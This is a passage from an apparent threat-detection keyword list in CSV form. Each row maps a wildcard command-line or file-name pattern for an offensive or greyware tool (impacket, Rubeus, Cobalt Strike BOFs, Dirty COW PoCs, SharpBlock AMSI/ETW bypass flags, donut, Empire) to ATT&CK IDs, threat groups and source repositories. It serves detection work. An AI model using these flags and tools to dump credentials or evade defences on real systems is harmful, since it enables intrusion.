movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -dc-ip * -dump *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -dc-ip * -impersonate *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* --dc-ip * -request * -format hashcat*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,0,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z -* -dc-ip * -target-ip *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* --dc-ip * --vuln --enabled*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -dc-ip *SAMDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* dclist *,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dcow.c *,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,0,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -* dcow.cpp*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/gbonacini/CVE-2016-5195,1,0,N/A,N/A,3,289,122,2017-03-21T16:46:38Z,2016-10-23T00:16:33Z -* -DDONUT_EXE *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* --deauth * -a TR:GT:AP:BS:SS:ID wlan*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* decrypt *.aes.zip*,offensive_tool_keyword,EncryptedZIP,Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory,T1564.001 - T1027 - T1214.001,TA0005 - TA0010,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -* deepce.sh *--install*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* default_logins.txt*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -* Defense_Evasion.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -* DelegationBOF.c *,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -* delegationx64.o*,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -* delegationx86.o*,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -* deluge-rpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* demiguise.py*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,0,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -* Dendron.exe*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -* denied AXFR from *,greyware_tool_keyword,dns,Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -* deploy_cobalt_beacon*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -* DesertFox.go,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,0,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -* -DestHost * -DestPort 5555 -UseDefaultProxy*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -* detect-hooks.c *,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,0,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -* dhcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* diagrun=true service=DNS* dllpath=*.dll* computername=*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,0,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z -* diamond * /certificate:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* diamond /tgtdeleg *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* diamond /user:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* dicom-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dicom-ping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dict-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* DInvokeResolver.*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -* dir /s */ Microsoft.ActiveDirectory.Management.dll*,greyware_tool_keyword,dir,threat actors searched for Active Directory related DLLs in directories,T1059 - T1083 - T1018,A0002 - TA0009 - TA0040,N/A,N/A,Discovery,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -* dirty.c*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/FireFart/dirtycow,1,0,N/A,N/A,8,767,437,2021-04-08T11:35:12Z,2016-11-25T21:08:01Z -* dirtycow.c *,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,0,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -* Dirty-Pipe.*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/bbaranoff/CVE-2022-0847,1,0,N/A,N/A,1,49,25,2022-03-07T15:52:23Z,2022-03-07T15:50:18Z -* Dirty-Pipe.sh*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/puckiestyle/CVE-2022-0847,1,0,N/A,N/A,1,1,1,2022-03-10T08:10:40Z,2022-03-08T14:46:21Z -* --disable-bypass-amsi*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -* --disable-bypass-cmdline*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -* --disable-bypass-etw*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -* DisableETW(*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* DisableWLDP(*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* distcc-cve2004-2687.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --dll * --only *AmsiScanBuffer*AmsiScanString*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -* --dll * --payload *,offensive_tool_keyword,SharpDllProxy,Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading,T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,Defense Evasion,https://github.com/Flangvik/SharpDllProxy,1,0,N/A,N/A,6,565,76,2020-07-21T17:14:01Z,2020-07-12T10:46:48Z -* --dll C:\Windows\System32\version.dll*--dll C:\Windows\System32\userenv.dll*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -* --dll --dllhijack *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -DllName * -FunctionName *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-BypassUACTokenManipulation.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -dns_stager_prepend *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -* -dns_stager_subhost *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 